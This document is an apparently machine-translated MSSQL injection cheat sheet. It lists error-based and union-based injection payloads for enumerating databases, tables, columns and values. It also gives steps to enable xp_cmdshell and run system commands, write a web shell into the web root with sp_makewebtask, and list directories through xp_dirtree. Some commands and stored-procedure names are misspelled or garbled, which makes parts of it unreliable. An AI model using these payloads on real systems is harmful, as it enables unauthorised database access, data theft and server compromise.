MSSQL Database Security
1. MSSQL injection
1) key system table master
master.dbo.sysdatabases
key fields: name: database name, dbid: library ID
master.dbo.sysobjects
key fields: name: object name, id: the object id, uid: the owner of the target user id, status: the state of the object, xtype: Object type
master.dbo.syscolumns
key fields: name: field name, id: table id number, colid: field id
2). Manual inspection
And exists (select * from sysobjects) : checking the injection point type
determination rights: SELECT IS_SRVROLEMEMBER ( ' the sysadmin / the db_owner / public ')
information collection:
and @@ Version> 0 // database information
declare @d int // support Analyzing multi-line statement to query
and (select count (1) from [sysobjects])> = 0 // support subqueries
and user> 0 // get the current database user name
and 1 = convert (int, db_name ()) and 1 or = (select db_name ()) // current database name
and 1 = (select @@ servername) // local service name
and 1 = (select HAS_DBACCESS ( ' master')) // determine whether the library read permission
group by field name having 1 = 1-- // having the group by the lookup table name and column name
order by error injection http://blog.nsfocus.net/mssql-order-by/ query method
to query all database name: and 1 = ( select name from master.dbo.sysdatabases where dbid = 1 ) -
Query the current database of all tables: and (select top 1 name from (select top n name from sysobjects where xtype = 0x75 order by name) t order by name desc) = 0
query field name: and (select col_name (object_id ( ' table name '), n)) = 0
query field value: and (select top 1 field names from table)> 0 and (select top 1 field names from table where field name <> field value. 1)> 0
Union SELECT query injection
number match column: and 1 = 2 union all select null, null, null from table
data type mismatch: and 1 = 2 union all select 'a', null, null from table
queries all database names: (select name from master.dbo.sysdatabases where dbid = 1)
query the database for all tables: (select top 1 name from ( select top n name from sysobjects where xtype = 0x75 order by name) t order by name desc)
query field name: (select col_name ( object_id ( 'table'), n))
query field values: (select top 1 field names from table) (select top 1 field name from the field name table where <> field value 1)
2. Use MSSQL extended stored injection attacks
1) Check extended storage
xp_cmdshell: select count() from master.dbo.sysobject where xtype='X' and name='xp_cmdshell;
xp_regread: select count() from master.dbo.sysobjects where name='xp_regread'
2) Turn on extended storage
exec sp_configure 'show'advanced option',1;
exec sp_configure reconfigurel;
exec sp_configure 'xp_cmdshell',1;
exec sp_configure reconfigure;
3) Restoring the extended storage
Delete the original xp_cmdshell:; exec master..sp_dropextendedproc 'xp_cmdshell'
create xp_cmdshell:; exec master..sp_addextendprox xp_cmdshell, ' xplog70.dll'
4) extended stored under attack .sa permissions:
xp_cmdshell extended to execute arbitrary commands:; exec master..xp_cmdshell 'whoami' // execute commands
xp_regwrite operations registry and an open sandbox mode:
using sp_makewebtash write word Trojan:; exec sp_makewebtask 'c: \ inetpub \ wwwroot \ cimer .asp '; select' evil.file '-
Extended stored under attack 5) .db_owner permissions:
Analyzing user rights database: and 1 = (select is_member ( 'db_owner')); -
Create a table:; create table temp (dir nvarchar (255), depth varchar (255), files varchar (255), ID int NOT NULL IDENTITY (1,1)); -
using the expanded query xp_dirtree:; insert into temp (dir, depth, files) exec master.dbo.xp_dirtree 'c:', 1,1--
contents of the lookup table: and (select dir from temp where id = 1)> 0